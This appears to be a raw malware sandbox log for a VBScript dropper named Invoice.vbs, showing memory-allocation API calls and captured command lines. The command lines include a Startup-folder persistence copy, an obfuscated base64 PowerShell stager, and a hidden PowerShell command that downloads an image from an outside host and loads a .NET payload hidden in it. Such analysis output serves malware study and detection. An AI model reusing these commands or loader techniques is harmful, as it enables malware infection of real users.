allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024cc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024dc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02880000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02881000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02882000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02883000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02884000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02885000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02886000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02887000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02888000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02889000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0288a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0288b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0288c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0288d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0288e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0288f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a41000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a42000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a43000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a44000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\Invoice.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ OWU.vbs')"
cmdline powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\Invoice.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ OWU.vbs')
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⁂Bp⁂G0⁂YQBn⁂GU⁂VQBy⁂Gw⁂I⁂⁂9⁂C⁂⁂JwBo⁂HQ⁂d⁂Bw⁂HM⁂Og⁂v⁂C8⁂YwBk⁂G4⁂LgBw⁂Gk⁂e⁂Bl⁂Gw⁂YgBp⁂G4⁂LgBp⁂G8⁂LwB2⁂DI⁂LwBy⁂GU⁂Z⁂⁂t⁂Hc⁂aQBs⁂GQ⁂ZgBs⁂G8⁂dwBl⁂HI⁂LQ⁂x⁂GI⁂M⁂Bh⁂GY⁂N⁂⁂v⁂G8⁂cgBp⁂Gc⁂aQBu⁂GE⁂b⁂⁂v⁂HU⁂bgBp⁂HY⁂ZQBy⁂HM⁂bwBf⁂HY⁂YgBz⁂C4⁂agBw⁂GU⁂Zw⁂n⁂Ds⁂J⁂B3⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂g⁂D0⁂I⁂BO⁂GU⁂dw⁂t⁂E8⁂YgBq⁂GU⁂YwB0⁂C⁂⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBO⁂GU⁂d⁂⁂u⁂Fc⁂ZQBi⁂EM⁂b⁂Bp⁂GU⁂bgB0⁂Ds⁂J⁂Bp⁂G0⁂YQBn⁂GU⁂QgB5⁂HQ⁂ZQBz⁂C⁂⁂PQ⁂g⁂CQ⁂dwBl⁂GI⁂QwBs⁂Gk⁂ZQBu⁂HQ⁂LgBE⁂G8⁂dwBu⁂Gw⁂bwBh⁂GQ⁂R⁂Bh⁂HQ⁂YQ⁂o⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FU⁂cgBs⁂Ck⁂Ow⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBU⁂GU⁂e⁂B0⁂C⁂⁂PQ⁂g⁂Fs⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBU⁂GU⁂e⁂B0⁂C4⁂RQBu⁂GM⁂bwBk⁂Gk⁂bgBn⁂F0⁂Og⁂6⁂FU⁂V⁂BG⁂Dg⁂LgBH⁂GU⁂d⁂BT⁂HQ⁂cgBp⁂G4⁂Zw⁂o⁂CQ⁂aQBt⁂GE⁂ZwBl⁂EI⁂eQB0⁂GU⁂cw⁂p⁂Ds⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂RgBs⁂GE⁂Zw⁂g⁂D0⁂I⁂⁂n⁂Dw⁂P⁂BC⁂EE⁂UwBF⁂DY⁂N⁂Bf⁂FM⁂V⁂BB⁂FI⁂V⁂⁂+⁂D4⁂Jw⁂7⁂CQ⁂ZQBu⁂GQ⁂RgBs⁂GE⁂Zw⁂g⁂D0⁂I⁂⁂n⁂Dw⁂P⁂BC⁂EE⁂UwBF⁂DY⁂N⁂Bf⁂EU⁂TgBE⁂D4⁂Pg⁂n⁂Ds⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂C⁂⁂PQ⁂g⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FQ⁂ZQB4⁂HQ⁂LgBJ⁂G4⁂Z⁂Bl⁂Hg⁂TwBm⁂Cg⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂RgBs⁂GE⁂Zw⁂p⁂Ds⁂J⁂Bl⁂G4⁂Z⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂9⁂C⁂⁂J⁂Bp⁂G0⁂YQBn⁂GU⁂V⁂Bl⁂Hg⁂d⁂⁂u⁂Ek⁂bgBk⁂GU⁂e⁂BP⁂GY⁂K⁂⁂k⁂GU⁂bgBk⁂EY⁂b⁂Bh⁂Gc⁂KQ⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂C0⁂ZwBl⁂C⁂⁂M⁂⁂g⁂C0⁂YQBu⁂GQ⁂I⁂⁂k⁂GU⁂bgBk⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂C0⁂ZwB0⁂C⁂⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂Ds⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂C⁂⁂Kw⁂9⁂C⁂⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂RgBs⁂GE⁂Zw⁂u⁂Ew⁂ZQBu⁂Gc⁂d⁂Bo⁂Ds⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BM⁂GU⁂bgBn⁂HQ⁂a⁂⁂g⁂D0⁂I⁂⁂k⁂GU⁂bgBk⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂C0⁂I⁂⁂k⁂HM⁂d⁂Bh⁂HI⁂d⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂Ow⁂k⁂GI⁂YQBz⁂GU⁂Ng⁂0⁂EM⁂bwBt⁂G0⁂YQBu⁂GQ⁂I⁂⁂9⁂C⁂⁂J⁂Bp⁂G0⁂YQBn⁂GU⁂V⁂Bl⁂Hg⁂d⁂⁂u⁂FM⁂dQBi⁂HM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂Cw⁂I⁂⁂k⁂GI⁂YQBz⁂GU⁂Ng⁂0⁂Ew⁂ZQBu⁂Gc⁂d⁂Bo⁂Ck⁂Ow⁂k⁂GM⁂bwBt⁂G0⁂YQBu⁂GQ⁂QgB5⁂HQ⁂ZQBz⁂C⁂⁂PQ⁂g⁂Fs⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBD⁂G8⁂bgB2⁂GU⁂cgB0⁂F0⁂Og⁂6⁂EY⁂cgBv⁂G0⁂QgBh⁂HM⁂ZQ⁂2⁂DQ⁂UwB0⁂HI⁂aQBu⁂Gc⁂K⁂⁂k⁂GI⁂YQBz⁂GU⁂Ng⁂0⁂EM⁂bwBt⁂G0⁂YQBu⁂GQ⁂KQ⁂7⁂CQ⁂b⁂Bv⁂GE⁂Z⁂Bl⁂GQ⁂QQBz⁂HM⁂ZQBt⁂GI⁂b⁂B5⁂C⁂⁂PQ⁂g⁂Fs⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBS⁂GU⁂ZgBs⁂GU⁂YwB0⁂Gk⁂bwBu⁂C4⁂QQBz⁂HM⁂ZQBt⁂GI⁂b⁂B5⁂F0⁂Og⁂6⁂Ew⁂bwBh⁂GQ⁂K⁂⁂k⁂GM⁂bwBt⁂G0⁂YQBu⁂GQ⁂QgB5⁂HQ⁂ZQBz⁂Ck⁂Ow⁂k⁂HQ⁂eQBw⁂GU⁂I⁂⁂9⁂C⁂⁂J⁂Bs⁂G8⁂YQBk⁂GU⁂Z⁂BB⁂HM⁂cwBl⁂G0⁂YgBs⁂Hk⁂LgBH⁂GU⁂d⁂BU⁂Hk⁂c⁂Bl⁂Cg⁂JwBG⁂Gk⁂YgBl⁂HI⁂LgBI⁂G8⁂bQBl⁂Cc⁂KQ⁂7⁂CQ⁂bQBl⁂HQ⁂a⁂Bv⁂GQ⁂I⁂⁂9⁂C⁂⁂J⁂B0⁂Hk⁂c⁂Bl⁂C4⁂RwBl⁂HQ⁂TQBl⁂HQ⁂a⁂Bv⁂GQ⁂K⁂⁂n⁂FY⁂QQBJ⁂Cc⁂KQ⁂7⁂CQ⁂YQBy⁂Gc⁂dQBt⁂GU⁂bgB0⁂HM⁂I⁂⁂9⁂C⁂⁂L⁂⁂o⁂Cc⁂d⁂B4⁂HQ⁂LgBm⁂GM⁂dg⁂x⁂C8⁂Qg⁂v⁂Ho⁂bg⁂u⁂Gc⁂bgBp⁂GQ⁂b⁂Bp⁂HU⁂YgBk⁂HI⁂YQB5⁂G4⁂aQB3⁂C8⁂Lw⁂6⁂HM⁂c⁂B0⁂HQ⁂a⁂⁂n⁂Ck⁂Ow⁂k⁂G0⁂ZQB0⁂Gg⁂bwBk⁂C4⁂SQBu⁂HY⁂bwBr⁂GU⁂K⁂⁂k⁂G4⁂dQBs⁂Gw⁂L⁂⁂g⁂CQ⁂YQBy⁂Gc⁂dQBt⁂GU⁂bgB0⁂HM⁂KQ⁂=';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
cmdline cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\Invoice.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ OWU.vbs')"
cmdline powershell -command $Codigo = 'J⁂Bp⁂G0⁂YQBn⁂GU⁂VQBy⁂Gw⁂I⁂⁂9⁂C⁂⁂JwBo⁂HQ⁂d⁂Bw⁂HM⁂Og⁂v⁂C8⁂YwBk⁂G4⁂LgBw⁂Gk⁂e⁂Bl⁂Gw⁂YgBp⁂G4⁂LgBp⁂G8⁂LwB2⁂DI⁂LwBy⁂GU⁂Z⁂⁂t⁂Hc⁂aQBs⁂GQ⁂ZgBs⁂G8⁂dwBl⁂HI⁂LQ⁂x⁂GI⁂M⁂Bh⁂GY⁂N⁂⁂v⁂G8⁂cgBp⁂Gc⁂aQBu⁂GE⁂b⁂⁂v⁂HU⁂bgBp⁂HY⁂ZQBy⁂HM⁂bwBf⁂HY⁂YgBz⁂C4⁂agBw⁂GU⁂Zw⁂n⁂Ds⁂J⁂B3⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂g⁂D0⁂I⁂BO⁂GU⁂dw⁂t⁂E8⁂YgBq⁂GU⁂YwB0⁂C⁂⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBO⁂GU⁂d⁂⁂u⁂Fc⁂ZQBi⁂EM⁂b⁂Bp⁂GU⁂bgB0⁂Ds⁂J⁂Bp⁂G0⁂YQBn⁂GU⁂QgB5⁂HQ⁂ZQBz⁂C⁂⁂PQ⁂g⁂CQ⁂dwBl⁂GI⁂QwBs⁂Gk⁂ZQBu⁂HQ⁂LgBE⁂G8⁂dwBu⁂Gw⁂bwBh⁂GQ⁂R⁂Bh⁂HQ⁂YQ⁂o⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FU⁂cgBs⁂Ck⁂Ow⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBU⁂GU⁂e⁂B0⁂C⁂⁂PQ⁂g⁂Fs⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBU⁂GU⁂e⁂B0⁂C4⁂RQBu⁂GM⁂bwBk⁂Gk⁂bgBn⁂F0⁂Og⁂6⁂FU⁂V⁂BG⁂Dg⁂LgBH⁂GU⁂d⁂BT⁂HQ⁂cgBp⁂G4⁂Zw⁂o⁂CQ⁂aQBt⁂GE⁂ZwBl⁂EI⁂eQB0⁂GU⁂cw⁂p⁂Ds⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂RgBs⁂GE⁂Zw⁂g⁂D0⁂I⁂⁂n⁂Dw⁂P⁂BC⁂EE⁂UwBF⁂DY⁂N⁂Bf⁂FM⁂V⁂BB⁂FI⁂V⁂⁂+⁂D4⁂Jw⁂7⁂CQ⁂ZQBu⁂GQ⁂RgBs⁂GE⁂Zw⁂g⁂D0⁂I⁂⁂n⁂Dw⁂P⁂BC⁂EE⁂UwBF⁂DY⁂N⁂Bf⁂EU⁂TgBE⁂D4⁂Pg⁂n⁂Ds⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂C⁂⁂PQ⁂g⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FQ⁂ZQB4⁂HQ⁂LgBJ⁂G4⁂Z⁂Bl⁂Hg⁂TwBm⁂Cg⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂RgBs⁂GE⁂Zw⁂p⁂Ds⁂J⁂Bl⁂G4⁂Z⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂9⁂C⁂⁂J⁂Bp⁂G0⁂YQBn⁂GU⁂V⁂Bl⁂Hg⁂d⁂⁂u⁂Ek⁂bgBk⁂GU⁂e⁂BP⁂GY⁂K⁂⁂k⁂GU⁂bgBk⁂EY⁂b⁂Bh⁂Gc⁂KQ⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂C0⁂ZwBl⁂C⁂⁂M⁂⁂g⁂C0⁂YQBu⁂GQ⁂I⁂⁂k⁂GU⁂bgBk⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂C0⁂ZwB0⁂C⁂⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂Ds⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂C⁂⁂Kw⁂9⁂C⁂⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂RgBs⁂GE⁂Zw⁂u⁂Ew⁂ZQBu⁂Gc⁂d⁂Bo⁂Ds⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BM⁂GU⁂bgBn⁂HQ⁂a⁂⁂g⁂D0⁂I⁂⁂k⁂GU⁂bgBk⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂C0⁂I⁂⁂k⁂HM⁂d⁂Bh⁂HI⁂d⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂Ow⁂k⁂GI⁂YQBz⁂GU⁂Ng⁂0⁂EM⁂bwBt⁂G0⁂YQBu⁂GQ⁂I⁂⁂9⁂C⁂⁂J⁂Bp⁂G0⁂YQBn⁂GU⁂V⁂Bl⁂Hg⁂d⁂⁂u⁂FM⁂dQBi⁂HM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂Cw⁂I⁂⁂k⁂GI⁂YQBz⁂GU⁂Ng⁂0⁂Ew⁂ZQBu⁂Gc⁂d⁂Bo⁂Ck⁂Ow⁂k⁂GM⁂bwBt⁂G0⁂YQBu⁂GQ⁂QgB5⁂HQ⁂ZQBz⁂C⁂⁂PQ⁂g⁂Fs⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBD⁂G8⁂bgB2⁂GU⁂cgB0⁂F0⁂Og⁂6⁂EY⁂cgBv⁂G0⁂QgBh⁂HM⁂ZQ⁂2⁂DQ⁂UwB0⁂HI⁂aQBu⁂Gc⁂K⁂⁂k⁂GI⁂YQBz⁂GU⁂Ng⁂0⁂EM⁂bwBt⁂G0⁂YQBu⁂GQ⁂KQ⁂7⁂CQ⁂b⁂Bv⁂GE⁂Z⁂Bl⁂GQ⁂QQBz⁂HM⁂ZQBt⁂GI⁂b⁂B5⁂C⁂⁂PQ⁂g⁂Fs⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBS⁂GU⁂ZgBs⁂GU⁂YwB0⁂Gk⁂bwBu⁂C4⁂QQBz⁂HM⁂ZQBt⁂GI⁂b⁂B5⁂F0⁂Og⁂6⁂Ew⁂bwBh⁂GQ⁂K⁂⁂k⁂GM⁂bwBt⁂G0⁂YQBu⁂GQ⁂QgB5⁂HQ⁂ZQBz⁂Ck⁂Ow⁂k⁂HQ⁂eQBw⁂GU⁂I⁂⁂9⁂C⁂⁂J⁂Bs⁂G8⁂YQBk⁂GU⁂Z⁂BB⁂HM⁂cwBl⁂G0⁂YgBs⁂Hk⁂LgBH⁂GU⁂d⁂BU⁂Hk⁂c⁂Bl⁂Cg⁂JwBG⁂Gk⁂YgBl⁂HI⁂LgBI⁂G8⁂bQBl⁂Cc⁂KQ⁂7⁂CQ⁂bQBl⁂HQ⁂a⁂Bv⁂GQ⁂I⁂⁂9⁂C⁂⁂J⁂B0⁂Hk⁂c⁂Bl⁂C4⁂RwBl⁂HQ⁂TQBl⁂HQ⁂a⁂Bv⁂GQ⁂K⁂⁂n⁂FY⁂QQBJ⁂Cc⁂KQ⁂7⁂CQ⁂YQBy⁂Gc⁂dQBt⁂GU⁂bgB0⁂HM⁂I⁂⁂9⁂C⁂⁂L⁂⁂o⁂Cc⁂d⁂B4⁂HQ⁂LgBm⁂GM⁂dg⁂x⁂C8⁂Qg⁂v⁂Ho⁂bg⁂u⁂Gc⁂bgBp⁂GQ⁂b⁂Bp⁂HU⁂YgBk⁂HI⁂YQB5⁂G4⁂aQB3⁂C8⁂Lw⁂6⁂HM⁂c⁂B0⁂HQ⁂a⁂⁂n⁂Ck⁂Ow⁂k⁂G0⁂ZQB0⁂Gg⁂bwBk⁂C4⁂SQBu⁂HY⁂bwBr⁂GU⁂K⁂⁂k⁂G4⁂dQBs⁂Gw⁂L⁂⁂g⁂CQ⁂YQBy⁂Gc⁂dQBt⁂GU⁂bgB0⁂HM⁂KQ⁂=';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
cmdline "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\Invoice.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ OWU.vbs')"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://cdn.pixelbin.io/v2/red-wildflower-1b0af4/original/universo_vbs.jpeg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.fcv1/B/zn.gnidliubdrayniw//:sptth');$method.Invoke($null, $arguments)"
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\Invoice.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ OWU.vbs')"
filepath: cmd.exe
1 1 0

CreateProcessInternalW

thread_identifier: 2432
thread_handle: 0x000002b0
process_identifier: 2428
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
